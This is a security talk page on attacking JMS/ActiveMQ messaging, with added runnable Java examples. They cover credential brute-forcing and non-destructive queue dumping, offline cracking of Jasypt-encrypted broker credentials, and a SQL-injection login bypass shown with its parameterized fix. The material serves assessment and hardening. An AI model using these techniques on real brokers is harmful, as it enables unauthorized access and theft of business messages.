Presentation Material
Abstract
Audio of session: https://www.youtube.com/watch?v=09uc435FEWY&list=PLpr-xdpM8wG8ODR2zWs06JkMmlRiLyBXU&index=29

Message Oriented Middleware (MOM) allows disparate applications to communicate with each other by exchanging information in the form of messages. A MOM and its clients create an enterprise messaging application that forms the transactional backbone of several large organizations worldwide. Security is therefore an important aspect of these applications. This research analyzes enterprise messaging security from three different perspectives:

1. The first perspective derives from the fact that most of the enterprise messaging products support the vendor-agnostic Java Messaging Service (JMS) API and therefore focuses on the offensive uses of the JMS API to attack an enterprise messaging application.
2. The second perspective revolves around a JMS compliant message broker (or MOM), as message brokers form the core of enterprise messaging. I chose ActiveMQ for my research as it is open source and among the most popular message brokers that support the JMS API. I will discuss a few ActiveMQ 0day vulnerabilities, potential flaws in its various authentication schemes and its configuration defaults that can make it vulnerable to attacks.
3. The third perspective focuses on a new tool, JMSDigger, that can be leveraged to engage and assess enterprise messaging applications.

Several live demonstrations will show attacks such as authentication bypass, JMS destination dumps, 0day vulnerabilities, JMSDigger etc.
AI Generated Summary
This talk addresses how little security attention enterprise messaging systems receive, specifically those implementing the Java Message Service (JMS) standard. These asynchronous systems form the transaction backbone of many financial and other large organizations, yet they are often assumed to be safe simply because they sit on internal networks and are treated as legacy plumbing.
The speaker introduced JMSDigger, an open-source assessment tool written against the JMS API. Its core functionality includes testing authentication mechanisms, brute-forcing credentials, intercepting and categorizing message streams by JMS message type (TextMessage, ObjectMessage and so on), and manipulating durable subscribers. It was developed against ActiveMQ, but because it is written to the generic JMS API it can be pointed at other JMS-compliant brokers.
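To make the JMSDigger capabilities above concrete, here is an added example (mine, not JMSDigger's or ActiveMQ's code) that performs the same three operations through the plain JMS API: an authentication test, a dictionary attack built on it, and a non-consuming destination dump that buckets messages by JMS type. It runs offline against an embedded ActiveMQ 5.x broker (activemq-all on the classpath) protected by SimpleAuthenticationPlugin; the broker name, the ORDERS.IN queue, the user accounts and the seeded messages are all constructed for the demonstration.

```java
import java.util.Arrays;
import java.util.Enumeration;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import javax.jms.*;
import org.apache.activemq.ActiveMQConnectionFactory;
import org.apache.activemq.broker.BrokerPlugin;
import org.apache.activemq.broker.BrokerService;
import org.apache.activemq.security.AuthenticationUser;
import org.apache.activemq.security.SimpleAuthenticationPlugin;

public class JmsAssess {
    // In-VM transport to the embedded broker started in main(); point the same
    // code at a live broker by using e.g. "tcp://broker.example:61616" instead.
    static final String BROKER_URL = "vm://assess?create=false";
    static final String QUEUE = "ORDERS.IN";   // hypothetical destination name

    // The broker may already have dropped a rejected connection; do not let that mask the result.
    static void closeQuietly(Connection c) {
        try { c.close(); } catch (JMSException ignored) { }
    }

    // Authentication test. ActiveMQ sends ConnectionInfo on start(); a rejected
    // username/password surfaces as JMSSecurityException.
    static boolean tryLogin(String user, String pass) throws JMSException {
        Connection c = new ActiveMQConnectionFactory(BROKER_URL).createConnection(user, pass);
        try {
            c.start();
            return true;
        } catch (JMSSecurityException e) {
            return false;
        } finally {
            closeQuietly(c);
        }
    }

    // Dictionary attack on the same primitive; returns the first accepted password.
    static String bruteForce(String user, List<String> wordlist) throws JMSException {
        for (String candidate : wordlist) {
            if (tryLogin(user, candidate)) return candidate;
        }
        return null;
    }

    // Destination dump. A QueueBrowser reads without consuming, so the legitimate
    // consumers miss nothing. Messages are bucketed by JMS type; ObjectMessages
    // carry serialized Java objects and deserve the closest look.
    static Map<String, Integer> browseQueue(String user, String pass) throws JMSException {
        Map<String, Integer> byType = new LinkedHashMap<>();
        Connection c = new ActiveMQConnectionFactory(BROKER_URL).createConnection(user, pass);
        try {
            c.start();
            Session s = c.createSession(false, Session.AUTO_ACKNOWLEDGE);
            Enumeration<?> e = s.createBrowser(s.createQueue(QUEUE)).getEnumeration();
            while (e.hasMoreElements()) {
                Message m = (Message) e.nextElement();
                String kind = m instanceof TextMessage ? "TextMessage"
                        : m instanceof ObjectMessage ? "ObjectMessage"
                        : m instanceof MapMessage ? "MapMessage"
                        : m instanceof BytesMessage ? "BytesMessage" : "Other";
                byType.merge(kind, 1, Integer::sum);
                if (m instanceof TextMessage) System.out.println("  [text] " + ((TextMessage) m).getText());
            }
        } finally {
            closeQuietly(c);
        }
        return byType;
    }

    // Constructed sample traffic standing in for the real producing application.
    static void seed(String user, String pass) throws JMSException {
        Connection c = new ActiveMQConnectionFactory(BROKER_URL).createConnection(user, pass);
        try {
            c.start();
            Session s = c.createSession(false, Session.AUTO_ACKNOWLEDGE);
            MessageProducer p = s.createProducer(s.createQueue(QUEUE));
            p.send(s.createTextMessage("{\"order\":1,\"card\":\"4111-xxxx-xxxx-1111\"}"));
            p.send(s.createObjectMessage(new java.util.Date()));
        } finally {
            closeQuietly(c);
        }
    }

    public static void main(String[] args) throws Exception {
        // Embedded, non-persistent broker guarded only by SimpleAuthenticationPlugin:
        // it authenticates, but with no authorization map any valid user can browse anything.
        BrokerService broker = new BrokerService();
        broker.setBrokerName("assess");
        broker.setPersistent(false);
        broker.setUseJmx(false);
        SimpleAuthenticationPlugin auth = new SimpleAuthenticationPlugin(Arrays.asList(
                new AuthenticationUser("admin", "admin", "admins"),   // default-style credentials
                new AuthenticationUser("app", "s3cret", "users")));
        broker.setPlugins(new BrokerPlugin[] { auth });
        broker.start();
        try {
            seed("app", "s3cret");
            System.out.println("admin/admin accepted: " + tryLogin("admin", "admin"));
            System.out.println("app password guessed: "
                    + bruteForce("app", Arrays.asList("password", "app", "s3cret")));
            System.out.println("queue contents by type: " + browseQueue("admin", "admin"));
        } finally {
            broker.stop();
        }
    }
}
```

Compile and run with activemq-all on the classpath; the run accepts admin/admin, recovers s3cret on the third guess, and reports one TextMessage and one ObjectMessage with the card-number text printed. Two design points carry over to a real engagement: the browser is deliberately used instead of a consumer so the assessment is non-destructive, and the only authentication-specific code is the JMSSecurityException catch, which is why the same logic transfers to any broker that speaks JMS.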
Key vulnerabilities presented focus on ActiveMQ. A critical finding was its web administration console, which older releases shipped without any authentication (the Jetty console on default port 8161, not to be confused with the OpenWire broker transport on 61616), allowing unauthenticated users to create and delete destinations and read sensitive queued messages. Several instances of this console exposed directly to the internet were identified. Other issues included a cross-site scripting (XSS) flaw in the message scheduler, SSL/TLS misconfigurations that enable man-in-the-middle attacks because certificates are not properly validated, and a fundamental weakness in credential storage: passwords in ActiveMQ configuration files are protected with reversible password-based encryption keyed by a single master password rather than with a one-way hash, so brute-forcing that master password offline recovers every stored credential at once. Furthermore, custom broker authentication plugins that look users up in an external store such as LDAP or MySQL were shown to be vulnerable to SQL injection, allowing complete authentication bypass.
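The credential-storage problem comes from how ActiveMQ protects secrets in its configuration: the activemq encrypt command wraps values as ENC(...) using Jasypt's StandardPBEStringEncryptor with a single master password taken from ACTIVEMQ_ENCRYPTION_PASSWORD, and the broker decrypts them when it loads files such as conf/credentials-enc.properties. Because the operation is reversible and the key derivation is cheap (Jasypt's default PBEWithMD5AndDES with 1000 iterations), anyone holding the file can guess the master password offline. The following is an added example of that offline attack, written for this page rather than taken from ActiveMQ or from the talk; it assumes jasypt on the classpath, and the master password, wordlist and the two ENC() entries are constructed inline.

```java
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.jasypt.encryption.pbe.StandardPBEStringEncryptor;
import org.jasypt.exceptions.EncryptionOperationNotPossibleException;

public class EncCredentialsCrack {
    // Jasypt's default PBE algorithm, also used by ActiveMQ's encrypt command:
    // PBKDF1 over MD5 (1000 iterations by default) deriving a single-DES key.
    static final String ALGORITHM = "PBEWithMD5AndDES";
    static final Pattern ENC = Pattern.compile("^ENC\\((.+)\\)$");

    static StandardPBEStringEncryptor encryptor(String master) {
        StandardPBEStringEncryptor e = new StandardPBEStringEncryptor();
        e.setAlgorithm(ALGORITHM);
        e.setPassword(master);
        return e;
    }

    // What an operator produces with `activemq encrypt`: reversible, so the file
    // still contains the credential, just behind one master password.
    static String encrypt(String master, String plaintext) {
        return "ENC(" + encryptor(master).encrypt(plaintext) + ")";
    }

    // Returns the plaintext, or null when the master password is wrong. A wrong key
    // almost always fails the DES padding check, which Jasypt reports as
    // EncryptionOperationNotPossibleException.
    static String tryDecrypt(String master, String encValue) {
        Matcher m = ENC.matcher(encValue.trim());
        if (!m.matches()) return null;
        try {
            return encryptor(master).decrypt(m.group(1));
        } catch (EncryptionOperationNotPossibleException ex) {
            return null;
        }
    }

    // Offline attack on a credentials-enc.properties style file. Every ENC() value is
    // keyed by the same master password, so a candidate that decrypts all of them is
    // it; a lone padding-check false positive (about 1 in 256 per value) cannot
    // survive several values, which is why all entries are required to decrypt.
    static String crackMaster(List<String> candidates, List<String> encValues) {
        for (String candidate : candidates) {
            boolean all = true;
            for (String v : encValues) {
                if (tryDecrypt(candidate, v) == null) { all = false; break; }
            }
            if (all) return candidate;
        }
        return null;
    }

    public static void main(String[] args) {
        // Constructed sample: a master password and two entries an admin would have
        // generated with it, as they would appear in a properties file.
        String master = "activemq";
        List<String> file = Arrays.asList(
                encrypt(master, "admin"),      // activemq.password=ENC(...)
                encrypt(master, "s3cret"));    // guest.password=ENC(...)
        List<String> wordlist = Arrays.asList("password", "changeit", "activemq", "secret");

        String found = crackMaster(wordlist, file);
        System.out.println("master password: " + found);
        if (found == null) return;
        for (String v : file) {
            System.out.println(v + " -> " + tryDecrypt(found, v));
        }
    }
}
```

The run finds "activemq" on the third candidate and prints both decrypted credentials. The lesson is not that the algorithm is weak in isolation but that the design is: a reversible scheme means the master password is the only secret, it must be present wherever the broker starts (environment variable or startup script), and every credential in the file falls with it. Compare that with hashing, where recovering the stored form gives an attacker work per password rather than a single key to guess.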
The practical implications are severe. An attacker can intercept or steal business-critical messages (PII, financial data), disrupt operations by deleting queues, pivot into internal users' browsers through the XSS, or gain full broker access through weak or bypassable authentication. The talk concludes that enterprise messaging is a critical, overlooked attack surface that requires dedicated assessment, hardened configuration (changing or disabling default accounts, putting authentication in front of the web console, enforcing TLS with proper certificate validation, and treating encrypted configuration passwords as recoverable secrets), and secure coding practices for any custom authentication integration.
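The SQL injection finding applies to plugins that build their lookup query by concatenating the username and password taken from the incoming ConnectionInfo (its getUserName() and getPassword() values). The following added example, written for this page and not taken from the talk or from any plugin shown in it, isolates that query logic so it runs against an in-memory H2 database standing in for the plugin's MySQL backend: the vulnerable form beside the parameterized form, both driven with the same injected username. The table, account and injection string are constructed for the demonstration.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class PluginAuthQuery {
    // In-memory H2 database (h2 jar on the classpath) standing in for the plugin's MySQL backend.
    static final String DB_URL = "jdbc:h2:mem:brokerauth;DB_CLOSE_DELAY=-1";

    static void setup(Connection db) throws SQLException {
        try (Statement st = db.createStatement()) {
            st.execute("CREATE TABLE users (username VARCHAR(64), password VARCHAR(64))");
            st.execute("INSERT INTO users VALUES ('admin', 'Tr0ub4dor')");   // constructed account
        }
    }

    // The pattern behind the finding: values lifted from ConnectionInfo are spliced
    // straight into the SQL text, so a quote in the username rewrites the query.
    static boolean vulnerableLogin(Connection db, String user, String pass) throws SQLException {
        String sql = "SELECT 1 FROM users WHERE username = '" + user
                + "' AND password = '" + pass + "'";
        try (Statement st = db.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return rs.next();
        }
    }

    // Same lookup with bound parameters: the quote in the username is data, not SQL.
    static boolean safeLogin(Connection db, String user, String pass) throws SQLException {
        String sql = "SELECT 1 FROM users WHERE username = ? AND password = ?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setString(1, user);
            ps.setString(2, pass);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    public static void main(String[] args) throws SQLException {
        try (Connection db = DriverManager.getConnection(DB_URL)) {
            setup(db);
            String injectedUser = "admin' --";   // "--" comments out the password check
            System.out.println("vulnerable, wrong password:       " + vulnerableLogin(db, "admin", "wrong"));
            System.out.println("vulnerable, injected username:    " + vulnerableLogin(db, injectedUser, "anything"));
            System.out.println("parameterized, injected username: " + safeLogin(db, injectedUser, "anything"));
            System.out.println("parameterized, real credentials:  " + safeLogin(db, "admin", "Tr0ub4dor"));
        }
    }
}
```

The four lines print false, true, false, true: the concatenated query lets "admin' --" log in as admin with any password, while the prepared statement rejects it and still accepts the genuine pair. Parameterization addresses only the injection; a plugin that compares plaintext passwords in the database has a second problem, and in a real broker plugin the failure path should throw SecurityException so the broker refuses the connection rather than silently treating an exception as success.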